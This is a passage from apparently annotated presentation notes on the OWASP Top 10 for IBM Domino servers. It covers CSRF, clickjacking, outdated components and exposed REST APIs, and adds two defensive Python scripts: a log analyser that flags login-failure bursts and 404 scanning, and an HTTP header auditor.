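def find_bursts(lines, window=timedelta(minutes=5), threshold=10):
    """Return {ip: total_failures} for IPs with >= threshold auth failures
    inside some sliding window of the given length."""
    events = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and is_auth_failure(rec):
            events[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in events.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:   # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged


def find_scanners(lines, threshold=20):
    """Return {ip: distinct_404_paths} for IPs probing for resources that do
    not exist, the signature of a vulnerability scanner or a wordlist."""
    misses = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            misses[rec["ip"]].add(rec["path"])
    return {ip: len(p) for ip, p in misses.items() if len(p) >= threshold}


# Constructed sample log: one legitimate login, a 12-attempt guessing burst
# against the session login form, and a 25-path probe that finds nothing.
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Aug/2017:14:00:01 -0400] "POST /names.nsf?Login HTTP/1.1" 302 0',
    '198.51.100.4 - jdoe [10/Aug/2017:14:00:02 -0400] "GET /mail/jdoe.nsf HTTP/1.1" 200 4821',
    'this line is not in CLF and is skipped',
] + [
    f'203.0.113.7 - - [10/Aug/2017:14:03:{s:02d} -0400] "POST /names.nsf?Login HTTP/1.1" 200 1330'
    for s in range(0, 48, 4)
] + [
    f'192.0.2.9 - - [10/Aug/2017:14:10:{i:02d} -0400] "GET /probe{i}.nsf HTTP/1.1" 404 0'
    for i in range(25)
]

if __name__ == "__main__":
    import sys
    lines = list(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_LOG
    for ip, n in find_bursts(lines).items():
        print(f"auth burst: {ip} {n} failures")
    for ip, n in find_scanners(lines).items():
        print(f"scanner: {ip} {n} distinct 404 paths")
```

Run it against a real log with `python3 watch_domlog.py /path/to/access.log`; the two thresholds are starting points, and the output is exactly the kind of per-IP evidence a Fail2Ban jail or a firewall rule would act on.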
• 37. A8 – Cross-Site Request Forgery (CSRF) (HG)
  Am I vulnerable to CSRF? To check whether an application is vulnerable, see if any links and forms lack an unpredictable CSRF token. Without such a token, attackers can forge malicious requests. An alternate defense is to require the user to prove they intended to submit the request, such as through reauthentication.
  Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets. Multistep transactions are not inherently immune. Also be aware that Server-Side Request Forgery (SSRF) is also possible by tricking apps and APIs into generating arbitrary HTTP requests.
  Note that session cookies, source IP addresses, and other information automatically sent by the browser don’t defend against CSRF since they are included in the forged requests.
• 38. Domino Vulnerabilities – A8 (HG)
  – Prevent your content from being rendered in an iframe or frameset that you did not generate.
  – The Domino Web Administrator (webadmin.nsf) is vulnerable: turn it off on Internet-facing servers.
  – Domino framesets: DominoValidateFramesetSRC=1 makes sure the content in the frameset comes from the same database. https://www-10.lotus.com/ldd/dominowiki.nsf/dx/DominoValidateFramesetSRC
  – Set the X-Frame-Options response header (frequently required by compliance audits): http://www-01.ibm.com/support/docview.wss?uid=swg21568598
  – Caveat: these framing controls stop clickjacking. They do not stop a forged cross-site POST; state-changing forms in your own applications still need a per-session token or reauthentication.
• 39. A8 – X-Frame-Options Header (AP)
  – Use the header “X-Frame-Options” to tell browsers not to allow your page to be loaded in someone else’s frame.
  – Frequently required by customer security audits.
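A check that covers both slide 30 (is the Server header really gone?) and slide 39 (is the page framable?), as an added example that is not part of the presentation: it audits one HTTP response’s headers for the product/version leak, for a missing X-Frame-Options or CSP frame-ancestors, and, since slide 34 has you forcing HTTPS, for a missing Strict-Transport-Security and for a session cookie without Secure/HttpOnly. The two sample responses are constructed; the exact Server value a stock Domino server sends depends on your release, and the cookie name DomAuthSessId is Domino’s session cookie used here only as sample data.

```python
"""Audit an HTTP response's headers for server disclosure (A5), framing
protection (slide 39), HSTS and session-cookie flags.  Added example, not
from the presentation; sample responses are constructed and the default
Server value varies by Domino release."""
import re
import sys
import urllib.request

VERSION = re.compile(r"\d+\.\d+")
LEAKY_HEADERS = ("server", "x-powered-by", "x-aspnet-version")
PRODUCT_TOKENS = ("domino", "apache", "nginx", "iis", "tomcat", "websphere")


def audit_headers(headers):
    """Return a list of (severity, message) findings for one response.
    `headers` is a name->value dict; names are matched case-insensitively."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []

    # A5: a Server header with product or version is reconnaissance for free.
    for name in LEAKY_HEADERS:
        value = h.get(name, "")
        if VERSION.search(value):
            findings.append(("high", f"{name} reveals a version: {value!r}"))
        elif any(tok in value.lower() for tok in PRODUCT_TOKENS):
            findings.append(("low", f"{name} names the product: {value!r}"))

    # Slide 39: refuse to be framed by pages you did not generate.
    csp = h.get("content-security-policy", "").lower()
    xfo = h.get("x-frame-options", "").strip().upper()
    if "frame-ancestors" in csp:
        pass                       # the modern control; overrides X-Frame-Options
    elif xfo in ("DENY", "SAMEORIGIN"):
        pass
    elif xfo.startswith("ALLOW-FROM"):
        findings.append(("medium", "X-Frame-Options ALLOW-FROM is ignored by "
                                   "current browsers; use CSP frame-ancestors"))
    else:
        findings.append(("high", "no X-Frame-Options / CSP frame-ancestors: "
                                 "page can be framed (clickjacking)"))

    # Forcing HTTPS is only half done until browsers are told to stay on it.
    if "strict-transport-security" not in h:
        findings.append(("medium", "no Strict-Transport-Security header"))

    # A session cookie without Secure/HttpOnly leaks over HTTP or to script.
    cookie = h.get("set-cookie", "")
    if cookie:
        attrs = {a.strip().lower() for a in cookie.split(";")[1:]}
        missing = [f for f in ("secure", "httponly") if f not in attrs]
        if missing:
            findings.append(("medium", f"cookie lacks {', '.join(missing)}: "
                                       f"{cookie.split(';')[0]!r}"))
    return findings


def fetch_headers(url, timeout=10):
    """Headers of a live server via a HEAD request (no body downloaded)."""
    req = urllib.request.Request(url, method="HEAD")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return dict(resp.headers.items())


# Constructed samples: an out-of-the-box response, and a hardened one after
# HTTPDisableServerHeader=1, a custom Server header and response-header rules.
DEFAULT_RESPONSE = {
    "Server": "Lotus-Domino/9.0.1",
    "Content-Type": "text/html; charset=UTF-8",
    "Set-Cookie": "DomAuthSessId=0123ABCD; path=/",
}
HARDENED_RESPONSE = {
    "Server": "webfront",
    "Content-Type": "text/html; charset=UTF-8",
    "X-Frame-Options": "SAMEORIGIN",
    "Content-Security-Policy": "frame-ancestors 'self'",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    "Set-Cookie": "DomAuthSessId=0123ABCD; path=/; Secure; HttpOnly",
}

if __name__ == "__main__":
    headers = fetch_headers(sys.argv[1]) if len(sys.argv) > 1 else DEFAULT_RESPONSE
    for severity, message in audit_headers(headers) or [("ok", "no findings")]:
        print(f"[{severity}] {message}")
```

Point it at a real server with `python3 audit_headers.py https://your.domino.example/`; run it before and after the notes.ini and web site rule changes, and keep the after-output as evidence for the audit that asked for the header.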
• 40. A9 – Using Components with Known Vulnerabilities (HG)
  – The challenge is to continuously monitor the components (both client-side and server-side) you are using for new vulnerability reports. This monitoring can be very difficult because vulnerability reports are not standardized, making them hard to find and search for the details you need (e.g., the exact component in a product family that has the vulnerability). Worst of all, many vulnerabilities never get reported to central clearinghouses like CVE and NVD.
  – Determining if you are vulnerable requires searching these databases, as well as keeping abreast of project mailing lists and announcements for anything that might be a vulnerability. This process can be done manually, or with automated tools. If a vulnerability in a component is discovered, carefully evaluate whether you are actually vulnerable. Check to see if your code uses the vulnerable part of the component and whether the flaw could result in an impact you care about. Both checks can be difficult to perform as vulnerability reports can be deliberately vague.
• 41. Domino Vulnerabilities – A9 (HG)
  – What software is your application using? Does it have vulnerabilities? Keep an inventory, with versions, so you can answer that the day an advisory comes out.
    – JS libraries like jQuery, Select2
    – Java libraries (PDF, JSON, credit card processing, ...)
  – What software is IBM using? (Example: Java libraries, Apache Struts, etc.)
    – Example: the Apache Struts vulnerability
    – Be sure to keep the Domino JVM updated
    – Interim fixes
    – Latest Fix Pack
• 42. A10 – Under-protected APIs (HG)
  Am I vulnerable to attack? Testing your APIs for vulnerabilities should be similar to testing the rest of your application for vulnerabilities. All the different types of injection, authentication, access control, encryption, configuration, and other issues can exist in APIs just as in a traditional application.
  However, because APIs are designed for use by programs (not humans) they frequently lack a UI and also use complex protocols and complex data structures. These factors can make security testing difficult. The use of widely-used formats can help, such as Swagger (OpenAPI), REST, JSON, and XML. Some frameworks like GWT and some RPC implementations use custom formats. Some applications and APIs create their own protocol and data formats, like WebSockets.
  The breadth and complexity of APIs make it difficult to automate effective security testing, possibly leading to a false sense of security. Ultimately, knowing if your APIs are secure means carefully choosing a strategy to test all defenses that matter.
• 43. Domino Vulnerabilities – A10 (HG)
  – Know what is turned on in your applications and on your server.
    – Is DAS (Domino Access Services) turned on? It is enabled at the server level and again per database, so check both; it exposes documents and views over REST with no UI in front of them.
    – REST access to a database: XPages REST services, agents that serve up REST data, etc.
  – Do a code review: understand what data these might serve up and how much access is given. The ACL still applies, but anonymous or default access that was harmless behind a form is a data export once there is an API.
• 44. Closing
  – Security is the responsibility of EVERYONE.
  – Especially those of us in IT, even without a security job:
    – Developers have to ALWAYS design for security.
    – Admins have to ALWAYS plan and monitor to build resilient systems.
    – Management has to provide the resources and focus.